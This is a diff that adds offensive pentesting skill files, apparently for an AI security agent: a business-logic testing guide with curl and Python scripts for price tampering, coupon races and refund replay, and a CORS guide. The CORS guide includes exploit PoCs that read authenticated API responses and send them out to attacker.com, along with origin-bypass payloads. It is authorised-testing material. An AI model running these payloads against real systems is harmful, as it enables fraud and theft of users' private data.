  291. package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
  292. package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
  293. package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
  294. package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
  295. package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
  296. package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
  297. package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
  298. package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
  299. package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
  300. package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
  301. package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
  302. package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
  303. package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
  304. package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
  305. package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
  306. package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
  307. package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
  308. package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
  309. package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
  310. package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
  311. package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
  312. package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
  313. package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
  314. package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
  315. package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
  316. package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
  317. package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
  318. package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
  319. package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
  320. package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
  321. package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
  322. package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
  323. package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
  324. package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
  325. package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
  326. package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
  327. package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
  328. package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
  329. package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
  330. package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
  331. package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
  332. package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
  333. package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
  334. package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
  335. package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
  336. package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
  337. package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
  338. package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
  339. package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
  340. package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
  341. package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
  342. package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
  343. package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
  344. package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
  345. package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
@@ -0,0 +1,313 @@
1
+ <!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
2
+
3
+ ---
4
+ name: business-logic
5
+ description: Business logic testing for workflow bypass, state manipulation, and domain invariant violations
6
+ ---
7
+
8
+ # Business Logic Flaws
9
+
10
+ Business logic flaws exploit intended functionality to violate domain invariants: move money without paying, exceed limits, retain privileges, or bypass reviews. They require a model of the business, not just payloads.
11
+
12
+ ## Attack Surface
13
+
14
+ - Financial logic: pricing, discounts, payments, refunds, credits, chargebacks
15
+ - Account lifecycle: signup, upgrade/downgrade, trial, suspension, deletion
16
+ - Authorization-by-logic: feature gates, role transitions, approval workflows
17
+ - Quotas/limits: rate/usage limits, inventory, entitlements, seat licensing
18
+ - Multi-tenant isolation: cross-organization data or action bleed
19
+ - Event-driven flows: jobs, webhooks, sagas, compensations, idempotency
20
+
21
+ ## High-Value Targets
22
+
23
+ - Pricing/cart: price locks, quote to order, tax/shipping computation
24
+ - Discount engines: stacking, mutual exclusivity, scope (cart vs item), once-per-user enforcement
25
+ - Payments: auth/capture/void/refund sequences, partials, split tenders, chargebacks, idempotency keys
26
+ - Credits/gift cards/vouchers: issuance, redemption, reversal, expiry, transferability
27
+ - Subscriptions: proration, upgrade/downgrade, trial extension, seat counts, meter reporting
28
+ - Refunds/returns/RMAs: multi-item partials, restocking fees, return window edges
29
+ - Admin/staff operations: impersonation, manual adjustments, credit/refund issuance, account flags
30
+ - Quotas/limits: daily/monthly usage, inventory reservations, feature usage counters
31
+
32
+ ## Reconnaissance
33
+
34
+ ### Workflow Mapping
35
+
36
+ - Derive endpoints from the UI and proxy/network logs; map hidden/undocumented API calls, especially finalize/confirm endpoints
37
+ - Identify tokens/flags: stepToken, paymentIntentId, orderStatus, reviewState, approvalId; test reuse across users/sessions
38
+ - Document invariants: conservation of value (ledger balance), uniqueness (idempotency), monotonicity (non-decreasing counters), exclusivity (one active subscription)
39
+
40
+ ### Input Surface
41
+
42
+ - Hidden fields and client-computed totals; server must recompute on trusted sources
43
+ - Alternate encodings and shapes: arrays instead of scalars, objects with unexpected keys, null/empty/0/negative, scientific notation
44
+ - Business selectors: currency, locale, timezone, tax region; vary to trigger rounding and ruleset changes
45
+
46
+ ### State and Time Axes
47
+
48
+ - Replays: resubmit stale finalize/confirm requests
49
+ - Out-of-order: call finalize before verify; refund before capture; cancel after ship
50
+ - Time windows: end-of-day/month cutovers, daylight saving, grace periods, trial expiry edges
51
+
52
+ ## Key Vulnerabilities
53
+
54
+ ### State Machine Abuse
55
+
56
+ - Skip or reorder steps via direct API calls; verify server enforces preconditions on each transition
57
+ - Replay prior steps with altered parameters (e.g., swap price after approval but before capture)
58
+ - Split a single constrained action into many sub-actions under the threshold (limit slicing)
59
+
60
+ ### Concurrency and Idempotency
61
+
62
+ - Parallelize identical operations to bypass atomic checks (create, apply, redeem, transfer)
63
+ - Abuse idempotency: key scoped to path but not principal → reuse other users' keys; or idempotency stored only in cache
64
+ - Message reprocessing: queue workers re-run tasks on retry without idempotent guards; cause duplicate fulfillment/refund
65
+
66
+ ### Numeric and Currency
67
+
68
+ - Floating point vs decimal rounding; rounding/truncation favoring attacker at boundaries
69
+ - Cross-currency arbitrage: buy in currency A, refund in B at stale rates; tax rounding per-item vs per-order
70
+ - Negative amounts, zero-price, free shipping thresholds, minimum/maximum guardrails
71
+
72
+ ### Quotas, Limits, and Inventory
73
+
74
+ - Off-by-one and time-bound resets (UTC vs local); pre-warm at T-1s and post-fire at T+1s
75
+ - Reservation/hold leaks: reserve multiple, complete one, release not enforced; backorder logic inconsistencies
76
+ - Distributed counters without strong consistency enabling double-consumption
77
+
78
+ ### Refunds and Chargebacks
79
+
80
+ - Double-refund: refund via UI and support tool; refund partials summing above captured amount
81
+ - Refund after benefits consumed (downloaded digital goods, shipped items) due to missing post-consumption checks
82
+
83
+ ### Feature Gates and Roles
84
+
85
+ - Feature flags enforced client-side or at edge but not in core services; toggle names guessed or fallback to default-enabled
86
+ - Role transitions leaving stale capabilities (retain premium after downgrade; retain admin endpoints after demotion)
87
+
88
+ ## Advanced Techniques
89
+
90
+ ### Event-Driven Sagas
91
+
92
+ - Saga/compensation gaps: trigger compensation without original success; or execute success twice without compensation
93
+ - Outbox/Inbox patterns missing idempotency → duplicate downstream side effects
94
+ - Cron/backfill jobs operating outside request-time authorization; mutate state broadly
95
+
96
+ ### Microservices Boundaries
97
+
98
+ - Cross-service assumption mismatch: one service validates total, another trusts line items; alter between calls
99
+ - Header trust: internal services trusting X-Role or X-User-Id from untrusted edges
100
+ - Partial failure windows: two-phase actions where phase 1 commits without phase 2, leaving exploitable intermediate state
101
+
102
+ ### Multi-Tenant Isolation
103
+
104
+ - Tenant-scoped counters and credits updated without tenant key in the where-clause; leak across orgs
105
+ - Admin aggregate views allowing actions that impact other tenants due to missing per-tenant enforcement
106
+
107
+ ## Bypass Techniques
108
+
109
+ - Content-type switching (JSON/form/multipart) to hit different code paths
110
+ - Method alternation (GET performing state change; overrides via X-HTTP-Method-Override)
111
+ - Client recomputation: totals, taxes, discounts computed on client and accepted by server
112
+ - Cache/gateway differentials: stale decisions from CDN/APIM that are not identity-aware
113
+
114
+ ## Special Contexts
115
+
116
+ ### E-commerce
117
+
118
+ - Stack incompatible discounts via parallel apply; remove qualifying item after discount applied; retain free shipping after cart changes
119
+ - Modify shipping tier post-quote; abuse returns to keep product and refund
120
+
121
+ ### Banking/Fintech
122
+
123
+ - Split transfers to bypass per-transaction threshold; schedule vs instant path inconsistencies
124
+ - Exploit grace periods on holds/authorizations to withdraw again before settlement
125
+
126
+ ### SaaS/B2B
127
+
128
+ - Seat licensing: race seat assignment to exceed purchased seats; stale license checks in background tasks
129
+ - Usage metering: report late or duplicate usage to avoid billing or to over-consume
130
+
131
+ ## Chaining Attacks
132
+
133
+ - Business logic + race: duplicate benefits before state updates
134
+ - Business logic + IDOR: operate on others' resources once a workflow leak reveals IDs
135
+ - Business logic + CSRF: force a victim to complete a sensitive step sequence
136
+
137
+ ## Concrete Testing Procedures
138
+
139
+ ### Step 1: Map the Workflow with Caido + browser_action
140
+
141
+ **1a. Start Caido and route all traffic through it (do this ONCE per engagement):**
142
+
143
+ caido-setup
144
+ TOKEN="<bearer token from caido-setup output>"
145
+
146
+ **1b. Perform the full workflow in browser_action (Caido captures everything automatically):**
147
+
148
+ # browser_action: goto https://target.com → login → add to cart → checkout → pay
149
+ # All requests are captured in Caido history automatically
150
+
151
+ **1c. Query Caido to extract the full workflow request sequence:**
152
+
153
+ # Extract all requests to the target host, ordered by time
154
+ curl -sL -X POST http://127.0.0.1:48080/graphql \
155
+ -H "Content-Type: application/json" \
156
+ -H "Authorization: Bearer $TOKEN" \
157
+ -d '{"query":"query { requestsByOffset(limit:100, filter:{httpql:\"host.eq:target.com\"}) { edges { node { id method path query body response { statusCode length } } } count } }"}' \
158
+ | jq '.data.requestsByOffset.edges[].node | "\(.method) \(.path) → \(.response.statusCode)"' \
159
+ | tee output/workflow_map.txt
160
+
161
+ # Look for the state machine sequence:
162
+ # POST /api/cart/add → 200
163
+ # POST /api/checkout/init → 200 (step token issued here)
164
+ # POST /api/payment/confirm → 200 (final commit)
165
+
166
+ **1d. Extract raw request body for each critical step:**
167
+
168
+ # Get the full raw request for a specific step (use ID from workflow_map.txt)
169
+ REQUEST_ID="<id from step above>"
170
+ curl -sL -X POST http://127.0.0.1:48080/graphql \
171
+ -H "Content-Type: application/json" \
172
+ -H "Authorization: Bearer $TOKEN" \
173
+ -d "{\"query\":\"{ request(id:\\\"$REQUEST_ID\\\") { raw response { raw statusCode } } }\"}" \
174
+ | jq '.data.request.raw' | base64 -d | tee output/step_raw_request.txt
175
+
176
+ # Save step tokens, order IDs, payment intent IDs for manipulation in Steps 2-7
177
+
178
+ ### Step 2: Test State Machine — Skip Steps Directly
179
+
180
+ # Try calling final step (confirm) without completing earlier steps (init)
181
+ # Replace step tokens with valid session but NO prior initialization
182
+ curl -s -X POST https://target.com/api/checkout/confirm \
183
+ -H "Content-Type: application/json" \
184
+ -H "Cookie: session=<session>" \
185
+ -d '{"order_id":"12345","amount":0}' | tee output/state_skip_test.txt
186
+
187
+ # Check: does the server reject this, or does it process a $0 order?
188
+ # SUCCESS (vuln): 200 OK or order created without proper validation
189
+
190
+ ### Step 3: Test Price/Amount Manipulation
191
+
192
+ # Intercept cart request and replace server-sent price with 1 cent
193
+ curl -s -X POST https://target.com/api/cart/checkout \
194
+ -H "Content-Type: application/json" \
195
+ -H "Cookie: session=<session>" \
196
+ -d '{"items":[{"id":"prod_123","qty":1,"price":0.01}]}' | tee output/price_tamper.txt
197
+
198
+ # Also test negative amounts:
199
+ curl -s -X POST https://target.com/api/cart/checkout \
200
+ -H "Content-Type: application/json" \
201
+ -H "Cookie: session=<session>" \
202
+ -d '{"items":[{"id":"prod_123","qty":1,"price":-9999}]}' | tee output/negative_price.txt
203
+
204
+ ### Step 4: Test Race Condition (Double-Spend / Double-Redeem)
205
+
206
+ # Use parallel curl calls to race a one-time coupon or limited resource
207
+ # Bash parallel execution:
208
+ for i in $(seq 1 20); do
209
+ curl -s -X POST https://target.com/api/coupon/redeem \
210
+ -H "Content-Type: application/json" \
211
+ -H "Cookie: session=<session>" \
212
+ -d '{"code":"PROMO10"}' &
213
+ done
214
+ wait | tee output/race_condition_test.txt
215
+ # Count successful responses: grep -c '"success":true' output/race_condition_test.txt
216
+ # If >1 success → race condition confirmed
217
+
218
+ # Python concurrent version (more reliable):
219
+ python3 -c "
220
+ import requests, concurrent.futures, json
221
+ URL = 'https://target.com/api/coupon/redeem'
222
+ HEADERS = {'Cookie': 'session=<session>', 'Content-Type': 'application/json'}
223
+ DATA = json.dumps({'code': 'PROMO10'})
224
+ def redeem(_): return requests.post(URL, headers=HEADERS, data=DATA, timeout=5)
225
+ with concurrent.futures.ThreadPoolExecutor(max_workers=20) as ex:
226
+ results = list(ex.map(redeem, range(20)))
227
+ successes = [r.text for r in results if r.status_code == 200]
228
+ print(f'Successes: {len(successes)}')
229
+ print(successes[:3])
230
+ " | tee output/race_condition_python.txt
231
+
232
+ ### Step 5: Test Refund Abuse
233
+
234
+ # Step 1: Make a purchase, note order_id
235
+ # Step 2: Submit refund via UI → note refund_id
236
+ # Step 3: Replay same refund request (idempotency test)
237
+ REFUND_ID=$(cat output/refund_id.txt)
238
+ curl -s -X POST https://target.com/api/refund \
239
+ -H "Cookie: session=<session>" \
240
+ -d "{\"order_id\":\"$ORDER_ID\",\"amount\":50}" | tee output/refund_test1.txt
241
+ # Replay same request with same idempotency key:
242
+ curl -s -X POST https://target.com/api/refund \
243
+ -H "Cookie: session=<session>" \
244
+ -d "{\"order_id\":\"$ORDER_ID\",\"amount\":50}" | tee output/refund_test2.txt
245
+ # Check: does second refund succeed? If yes → double refund vulnerability
246
+
247
+ ### Step 6: Test Quota/Limit Bypass
248
+
249
+ # Test off-by-one at quota boundary (e.g., free tier = 10 API calls/day)
250
+ for i in $(seq 1 12); do
251
+ STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
252
+ -H "Cookie: session=<session>" \
253
+ https://target.com/api/limited_endpoint)
254
+ echo "Call $i: $STATUS"
255
+ done | tee output/quota_test.txt
256
+ # After quota hit (429), test if resetting session or using different header bypasses:
257
+ curl -s -X GET https://target.com/api/limited_endpoint \
258
+ -H "Cookie: session=<new_session_same_account>" | tee output/quota_bypass.txt
259
+
260
+ ### Step 7: Verify Persistence (MANDATORY before reporting)
261
+
262
+ # After exploit attempt, verify state change persisted in authoritative source
263
+ # Check account balance / order history / credit balance:
264
+ curl -s https://target.com/api/account/balance \
265
+ -H "Cookie: session=<session>" | tee output/balance_verify.txt
266
+ curl -s https://target.com/api/orders?limit=5 \
267
+ -H "Cookie: session=<session>" | tee output/orders_verify.txt
268
+ # ONLY report if you can show DURABLE state change (e.g., negative balance, extra refund shown in history)
269
+
270
+ ## Testing Methodology
271
+
272
+ 1. **Enumerate state machine** - Per critical workflow (states, transitions, pre/post-conditions); note invariants
273
+ 2. **Build Actor × Action × Resource matrix** - Unauth, basic user, premium, staff/admin; identify actions per role
274
+ 3. **Test transitions** - Step skipping, repetition, reordering, late mutation (use curl commands from Step 2-3 above)
275
+ 4. **Introduce variance** - Time, concurrency, channel (mobile/web/API/GraphQL), content-types (use race tests from Step 4)
276
+ 5. **Validate persistence boundaries** - All services, queues, and jobs re-enforce invariants (use Step 7 verification)
277
+
278
+ ## Validation
279
+
280
+ 1. Show an invariant violation (e.g., two refunds for one charge, negative inventory, exceeding quotas)
281
+ 2. Provide side-by-side evidence for intended vs abused flows with the same principal
282
+ 3. Demonstrate durability: the undesired state persists and is observable in authoritative sources (ledger, emails, admin views)
283
+ 4. Quantify impact per action and at scale (unit loss × feasible repetitions)
284
+
285
+ ## False Positives
286
+
287
+ - Promotional behavior explicitly allowed by policy (documented free trials, goodwill credits)
288
+ - Visual-only inconsistencies with no durable or exploitable state change
289
+ - Admin-only operations with proper audit and approvals
290
+
291
+ ## Impact
292
+
293
+ - Direct financial loss (fraud, arbitrage, over-refunds, unpaid consumption)
294
+ - Regulatory/contractual violations (billing accuracy, consumer protection)
295
+ - Denial of inventory/services to legitimate users through resource exhaustion
296
+ - Privilege retention or unauthorized access to premium features
297
+
298
+ ## Pro Tips
299
+
300
+ 1. Start from invariants and ledgers, not UI—prove conservation of value breaks
301
+ 2. Test with time and concurrency; many bugs only appear under pressure
302
+ 3. Recompute totals server-side; never accept client math—flag when you observe otherwise
303
+ 4. Treat idempotency and retries as first-class: verify key scope and persistence
304
+ 5. Probe background workers and webhooks separately; they often skip auth and rule checks
305
+ 6. Validate role/feature gates at the service that mutates state, not only at the edge
306
+ 7. Explore end-of-period edges (month-end, trial end, DST) for rounding and window issues
307
+ 8. Use minimal, auditable PoCs that demonstrate durable state change and exact loss
308
+ 9. Chain with authorization tests (IDOR/Function-level access) to magnify impact
309
+ 10. When in doubt, map the state machine; gaps appear where transitions lack server-side guards
310
+
311
+ ## Summary
312
+
313
+ Business logic security is the enforcement of domain invariants under adversarial sequencing, timing, and inputs. If any step trusts the client or prior steps, expect abuse.
@@ -0,0 +1,242 @@
1
+ <!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
2
+
3
+ ---
4
+ name: cors
5
+ description: CORS misconfiguration testing covering origin reflection, null origin bypass, trusted subdomain abuse, pre-flight bypass, and credential-bearing cross-origin requests
6
+ ---
7
+
8
+ # CORS Misconfiguration Testing
9
+
10
+ CORS misconfigurations are one of the most common bug bounty findings. A misconfigured CORS policy allows attacker-controlled origins to make authenticated cross-origin requests, stealing sensitive data including tokens, credentials, and PII.
11
+
12
+ ---
13
+
14
+ ## Core Concepts
15
+
16
+ CORS headers that matter for security:
17
+
18
+ Access-Control-Allow-Origin: https://trusted.com # Which origins allowed
19
+ Access-Control-Allow-Credentials: true # Cookies/auth sent cross-origin
20
+ Access-Control-Allow-Methods: GET, POST, PUT # Allowed HTTP methods
21
+ Access-Control-Allow-Headers: Authorization, X-Custom # Allowed request headers
22
+ Access-Control-Expose-Headers: X-Custom-Header # Headers JS can read
23
+
24
+ **Exploitable condition:** `ACAO: <attacker>` + `ACAC: true`
25
+ → Attacker can make authenticated request from their origin and read response.
26
+
27
+ ---
28
+
29
+ ## Identifying CORS Policy
30
+
31
+ # Send request with custom Origin header — observe ACAO response header:
32
+ curl -s -I <target>/api/user \
33
+ -H "Origin: https://attacker.com" \
34
+ -H "Cookie: session=<your_token>"
35
+
36
+ # Check response:
37
+ # Access-Control-Allow-Origin: https://attacker.com → reflected (VULNERABLE)
38
+ # Access-Control-Allow-Origin: * → wildcard (no creds)
39
+ # Access-Control-Allow-Origin: https://target.com → strict (safe)
40
+ # (missing header) → no CORS config
41
+
42
+ ---
43
+
44
+ ## Vulnerability Patterns
45
+
46
+ ### 1. Origin Reflection
47
+
48
+ Server blindly reflects any Origin header:
49
+
50
+ curl -s <target>/api/profile \
51
+ -H "Origin: https://evil.com" \
52
+ -H "Cookie: <auth>"
53
+ # Response: Access-Control-Allow-Origin: https://evil.com
54
+ # Access-Control-Allow-Credentials: true
55
+
56
+ # Exploit PoC:
57
+ <script>
58
+ fetch('https://<target>/api/profile', {
59
+ credentials: 'include'
60
+ })
61
+ .then(r => r.text())
62
+ .then(d => fetch('https://attacker.com/?data=' + btoa(d)));
63
+ </script>
64
+
65
+ ### 2. Prefix/Suffix Match Bypass
66
+
67
+ Regex-based origin validation with anchoring bugs:
68
+
69
+ # Target trusts: *.target.com
70
+ # Bypass: target.com.attacker.com — passes if regex is /target\.com/
71
+ curl -H "Origin: https://target.com.attacker.com" <target>/api/
72
+
73
+ # Trusts: /^https:\/\/target\.com/ (missing end anchor)
74
+ # Bypass: https://target.com.attacker.com
75
+ # Bypass: https://target.com.evil.com
76
+
77
+ # Trusts: /target\.com$/ (missing start anchor)
78
+ # Bypass: https://notarget.com
79
+
80
+ ### 3. Null Origin
81
+
82
+ # null origin is sent by: sandboxed iframes, local files, data: URIs
83
+ curl -s <target>/api/ -H "Origin: null" -H "Cookie: <auth>"
84
+ # If ACAO: null → exploitable via sandboxed iframe:
85
+
86
+ # Exploit:
87
+ <iframe sandbox="allow-scripts allow-top-navigation allow-forms"
88
+ srcdoc="<script>
89
+ fetch('https://<target>/api/user', {credentials: 'include'})
90
+ .then(r=>r.text())
91
+ .then(d=>top.location='https://attacker.com/?='+btoa(d))
92
+ </script>">
93
+ </iframe>
94
+
95
+ ### 4. Subdomain Takeover + CORS
96
+
97
+ If target trusts `*.target.com` and one subdomain is taken over:
98
+
99
+ # 1. Find dangling subdomain: legacy.target.com → CNAME → unclaimed hosting
100
+ # 2. Take over the subdomain (GitHub Pages, Netlify, etc.)
101
+ # 3. Host exploit from legacy.target.com
102
+ # 4. CORS policy trusts *.target.com → steal authenticated data
103
+
104
+ ### 5. HTTP Origin on HTTPS Target
105
+
106
+ # Some servers accept http:// origin on https:// target:
107
+ curl -s https://<target>/api/ -H "Origin: http://attacker.com"
108
+ # If ACAO: http://attacker.com + ACAC: true → downgrade attack
109
+
110
+ ### 6. Trusted Third-Party Origin
111
+
112
+ # If target trusts a third-party you can inject into:
113
+ Access-Control-Allow-Origin: https://trusted-partner.com
114
+ # → XSS on trusted-partner.com enables CORS exploit chain
115
+
116
+ ---
117
+
118
+ ## Testing All API Endpoints
119
+
120
+ # Test multiple CORS-sensitive endpoints:
121
+ for path in /api/user /api/profile /api/account /api/me /api/settings \
122
+ /api/tokens /api/keys /api/admin /v1/user /v2/me; do
123
+ echo "--- $path ---"
124
+ curl -s -I https://<target>$path \
125
+ -H "Origin: https://evil.com" \
126
+ -H "Cookie: <auth>" 2>/dev/null | grep -i "access-control"
127
+ done
128
+
129
+ ---
130
+
131
+ ## Pre-flight Request Testing
132
+
133
+ For non-simple requests (custom headers, PUT/DELETE), browser sends OPTIONS:
134
+
135
+ # Test pre-flight:
136
+ curl -X OPTIONS <target>/api/ \
137
+ -H "Origin: https://evil.com" \
138
+ -H "Access-Control-Request-Method: DELETE" \
139
+ -H "Access-Control-Request-Headers: X-Custom-Header" \
140
+ -v 2>&1 | grep -i "access-control"
141
+
142
+ # Check if pre-flight allows dangerous methods:
143
+ # Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH
144
+ # + reflected origin + credentials = can perform any method cross-origin
145
+
146
+ ---
147
+
148
+ ## Impact Assessment
149
+
150
+ | CORS Config | Credentials? | Exploitable? | Impact |
151
+ |-------------|-------------|-------------|--------|
152
+ | ACAO: * | No (forbidden with creds) | Partial | Low (no auth) |
153
+ | ACAO: * + ACAC: true | N/A (invalid) | No | — |
154
+ | ACAO: reflected | Yes | YES | Critical |
155
+ | ACAO: null | Yes | YES (sandboxed iframe) | High |
156
+ | ACAO: *.domain | Yes | YES (subdomain takeover) | High |
157
+ | ACAO: http:// on https | Yes | YES (MITM required) | Medium |
158
+
159
+ ---
160
+
161
+ ## CORS with JWT (No Cookie Auth)
162
+
163
+ If app uses Bearer tokens instead of cookies:
164
+
165
+ # ACAO: * + Bearer token auth = less impactful (attacker needs the token)
166
+ # But: if token is in localStorage and XSS exists → read token + make CORS request
167
+
168
+ # ACAO reflected + credentials: false → still useful with XSS to exfiltrate data
169
+
170
+ ---
171
+
172
+ ## Automation
173
+
174
+ # Corsy — CORS misconfiguration scanner:
175
+ pip install corsy
176
+ python3 corsy.py -u https://<target>/api/ -H "Cookie: <auth>"
177
+ python3 corsy.py -i urls.txt
178
+
179
+ # CORStest:
180
+ git clone https://github.com/RUB-NDS/CORStest
181
+ python3 corstest.py -p -o urls.txt
182
+
183
+ # Nuclei CORS templates:
184
+ nuclei -t exposures/cors/ -u <target>
185
+ nuclei -t misconfiguration/cors-misconfig.yaml -u <target>
186
+
187
+ # Manual payloads list to try as Origin:
188
+ https://evil.com
189
+ null
190
+ https://<target>.evil.com
191
+ https://evil<target>.com
192
+ http://<target>
193
+ https://<target>%60.evil.com (backtick bypass)
194
+ https://<target>_.evil.com
195
+
196
+ ---
197
+
198
+ ## PoC Template (Steal API Response)
199
+
200
+ <!-- CORS PoC — exfiltrate authenticated API response -->
201
+ <html>
202
+ <body>
203
+ <script>
204
+ var target = 'https://<TARGET>/api/me';
205
+ var exfil = 'https://attacker.com/collect?d=';
206
+
207
+ fetch(target, {
208
+ method: 'GET',
209
+ credentials: 'include', // Send cookies
210
+ headers: {
211
+ 'Accept': 'application/json'
212
+ }
213
+ })
214
+ .then(function(response) {
215
+ return response.text();
216
+ })
217
+ .then(function(data) {
218
+ // Exfiltrate the data
219
+ new Image().src = exfil + encodeURIComponent(data);
220
+ })
221
+ .catch(function(err) {
222
+ new Image().src = exfil + 'error:' + encodeURIComponent(err.toString());
223
+ });
224
+ </script>
225
+ </body>
226
+ </html>
227
+
228
+ ---
229
+
230
+ ## Pro Tips
231
+
232
+ 1. Test EVERY API endpoint — CORS is often misconfigured on specific routes, not globally
233
+ 2. Null origin bypass via sandboxed iframe works even with strict same-origin policies
234
+ 3. Subdomain takeover + CORS wildcard is a very impactful chain — always enumerate subdomains
235
+ 4. CORS `*` wildcard is NOT exploitable with credentials — only reflected/specific origins are
236
+ 5. Test both HTTP and HTTPS origins — some servers accept protocol downgrade
237
+ 6. Check pre-flight responses — `Access-Control-Allow-Methods: *` is also misconfiguration
238
+ 7. Always verify CORS works end-to-end in browser before reporting — some server-side checks aren't in headers
239
+
240
+ ## Summary
241
+
242
+ CORS testing = send `Origin: https://evil.com` to every authenticated API endpoint + check if `Access-Control-Allow-Origin` reflects it + check if `Access-Control-Allow-Credentials: true`. Reflected origin with credentials = critical — you can steal any authenticated response (tokens, PII, account data). Also test `Origin: null` (sandboxed iframe bypass) and `*.domain.com` patterns for subdomain takeover chains.